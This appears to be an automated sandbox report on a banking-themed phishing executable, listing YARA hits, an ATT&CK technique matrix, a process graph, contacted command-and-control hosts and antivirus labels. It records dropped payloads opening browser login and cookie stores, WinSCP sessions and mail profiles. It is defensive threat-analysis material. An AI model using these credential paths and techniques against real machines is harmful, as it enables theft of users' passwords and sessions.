                          Source: Yara matchFile source: 5.2.svchost.exe.8400f08.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.17.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8600f08.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.15.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8480000.41.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.72a8b90.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8600000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8b00f08.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6fa8b90.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8400000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.72a8b90.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.7205570.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.16.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.svchost.exe.8200f08.18.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8480000.40.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8b00000.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.18.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000022.00000003.1483462887.0000000008600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1577778530.0000000005E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000003.1283416530.0000000008200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1328426557.0000000008260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1300865419.0000000005800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1596364234.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1580669736.0000000007205000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1329059100.0000000008400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1596182253.0000000008640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                          Source: Yara matchFile source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3712810154.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 520, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 520, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                          Source: Yara matchFile source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED
                          Source: Yara matchFile source: 5.2.svchost.exe.5800f16.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8640000.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8400000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.7206478.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.svchost.exe.8200000.17.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.5800f16.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8400f08.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.42.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.5e00f16.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8b00000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.7206478.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.7205570.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.5e00f16.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8600f08.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.13.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8b00f08.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8260000.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8260000.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8640000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.svchost.exe.8200f08.18.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.svchost.exe.8200000.17.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8600000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8400f08.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.17.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8600f08.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.15.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8480000.41.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.72a8b90.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8600000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8b00f08.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6fa8b90.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8400000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.72a8b90.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.7205570.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.16.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.svchost.exe.8200f08.18.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8480000.40.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8b00000.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.18.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000022.00000003.1483462887.0000000008600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1577778530.0000000005E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000003.1283416530.0000000008200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1328426557.0000000008260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1300865419.0000000005800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1596364234.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1580669736.0000000007205000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1329059100.0000000008400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1596182253.0000000008640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_000D923B
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_000D8C4F
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_0091923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_0091923B
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00918C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00918C4F
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information111
                          Scripting
                          2
                          Valid Accounts
                          121
                          Windows Management Instrumentation
                          111
                          Scripting
                          1
                          Exploitation for Privilege Escalation
                          111
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          2
                          System Time Discovery
                          1
                          Taint Shared Content
                          11
                          Archive Collected Data
                          2
                          Ingress Tool Transfer
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts14
                          Native API
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          11
                          Deobfuscate/Decode Files or Information
                          211
                          Input Capture
                          1
                          Account Discovery
                          Remote Desktop Protocol2
                          Data from Local System
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          Scheduled Task/Job
                          2
                          Valid Accounts
                          2
                          Valid Accounts
                          4
                          Obfuscated Files or Information
                          1
                          Credentials in Registry
                          3
                          File and Directory Discovery
                          SMB/Windows Admin Shares1
                          Screen Capture
                          1
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts2
                          Service Execution
                          1
                          Windows Service
                          21
                          Access Token Manipulation
                          11
                          Software Packing
                          NTDS148
                          System Information Discovery
                          Distributed Component Object Model1
                          Email Collection
                          3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchd1
                          Scheduled Task/Job
                          1
                          Windows Service
                          1
                          Timestomp
                          LSA Secrets1
                          Query Registry
                          SSH211
                          Input Capture
                          24
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled Task2
                          Registry Run Keys / Startup Folder
                          312
                          Process Injection
                          1
                          DLL Side-Loading
                          Cached Domain Credentials351
                          Security Software Discovery
                          VNC4
                          Clipboard Data
                          Multiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                          Scheduled Task/Job
                          111
                          Masquerading
                          DCSync141
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                          Registry Run Keys / Startup Folder
                          2
                          Valid Accounts
                          Proc Filesystem3
                          Process Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                          Virtualization/Sandbox Evasion
                          /etc/passwd and /etc/shadow11
                          Application Window Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                          Access Token Manipulation
                          Network Sniffing1
                          System Owner/User Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                          Process Injection
                          Input Capture1
                          System Network Configuration Discovery
                          Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564711 Sample: Ziraat_Bankasi_Swift_Mesaji... Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 95 reallyfreegeoip.org 2->95 97 ssbzmoy.biz 2->97 99 7 other IPs or domains 2->99 121 Suricata IDS alerts for network traffic 2->121 123 Found malware configuration 2->123 125 Malicious sample detected (through community Yara rule) 2->125 129 19 other signatures 2->129 12 Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe 4 2->12         started        16 wscript.exe 2->16         started        18 TrojanAIbot.exe 2->18         started        20 2 other processes 2->20 signatures3 127 Tries to detect the country of the analysis system (by using the IP) 95->127 process4 file5 85 C:\Users\user\AppData\Local\...\spadixes.exe, PE32 12->85 dropped 159 Antivirus detection for dropped file 12->159 161 Binary is likely a compiled AutoIt script file 12->161 163 Machine Learning detection for dropped file 12->163 22 spadixes.exe 2 12->22         started        165 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->165 26 spadixes.exe 16->26         started        167 Multi AV Scanner detection for dropped file 18->167 signatures6 process7 file8 79 C:\Users\user\AppData\...\spadixes.vbs, data 22->79 dropped 149 Antivirus detection for dropped file 22->149 151 Binary is likely a compiled AutoIt script file 22->151 153 Machine Learning detection for dropped file 22->153 155 4 other signatures 22->155 28 svchost.exe 8 22->28         started        32 spadixes.exe 26->32         started        34 svchost.exe 26->34         started        signatures9 process10 file11 87 C:\Windows\System32\alg.exe, PE32+ 28->87 dropped 89 C:\Users\user\AppData\Local\...\server02.exe, PE32 28->89 dropped 91 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 28->91 dropped 93 2 other malicious files 28->93 dropped 169 Drops executable to a common third party application directory 28->169 171 Infects executable files (exe, dll, sys, html) 28->171 36 neworigin.exe 14 2 28->36         started        40 TrojanAI.exe 7 28->40         started        43 server02.exe 15 2 28->43         started        173 Binary is likely a compiled AutoIt script file 32->173 45 spadixes.exe 32->45         started        47 svchost.exe 32->47         started        signatures12 process13 dnsIp14 101 s82.gocheapweb.com 51.195.88.199, 49705, 49716, 49930 OVHFR France 36->101 103 api.ipify.org 172.67.74.152, 443, 49702 CLOUDFLARENETUS United States 36->103 131 Antivirus detection for dropped file 36->131 133 Multi AV Scanner detection for dropped file 36->133 135 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 36->135 147 4 other signatures 36->147 81 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 40->81 dropped 137 Machine Learning detection for dropped file 40->137 139 Uses schtasks.exe or at.exe to add and modify task schedules 40->139 141 Adds a directory exclusion to Windows Defender 40->141 49 powershell.exe 40->49         started        52 cmd.exe 40->52         started        54 schtasks.exe 40->54         started        56 TrojanAIbot.exe 40->56         started        105 checkip.dyndns.com 132.226.8.169, 49701, 80 UTMEMUS United States 43->105 107 reallyfreegeoip.org 172.67.177.134, 443, 49704 CLOUDFLARENETUS United States 43->107 143 Tries to steal Mail credentials (via file / registry access) 43->143 145 Binary is likely a compiled AutoIt script file 45->145 58 spadixes.exe 45->58         started        60 svchost.exe 45->60         started        file15 signatures16 process17 signatures18 113 Loading BitLocker PowerShell Module 49->113 62 conhost.exe 49->62         started        64 WmiPrvSE.exe 49->64         started        66 conhost.exe 52->66         started        68 timeout.exe 52->68         started        70 conhost.exe 54->70         started        115 Binary is likely a compiled AutoIt script file 58->115 117 Writes to foreign memory regions 58->117 119 Maps a DLL or memory area into another process 58->119 72 svchost.exe 58->72         started        process19 dnsIp20 109 ssbzmoy.biz 18.141.10.107, 49745, 80 AMAZON-02US United States 72->109 111 pywolwnvd.biz 54.244.188.177, 49738, 49753, 80 AMAZON-02US United States 72->111 83 Ziraat_Bankasi_Swi...esaji_BXB04958T.exe, PE32 72->83 dropped 157 System process connects to network (likely due to code injection or exploit) 72->157 77 TrojanAI.exe 72->77         started        file21 signatures22 process23

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe42%ReversingLabsWin32.Trojan.AutoitInject
                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
                          C:\Users\user\AppData\Local\Temp\TrojanAI.exe100%AviraHEUR/AGEN.1311721
                          C:\Users\user\AppData\Local\Temp\server02.exe100%AviraTR/ATRAPS.Gen
                          C:\Users\user\AppData\Local\bothsided\spadixes.exe100%AviraW32/Infector.Gen
                          C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%AviraHEUR/AGEN.1311721
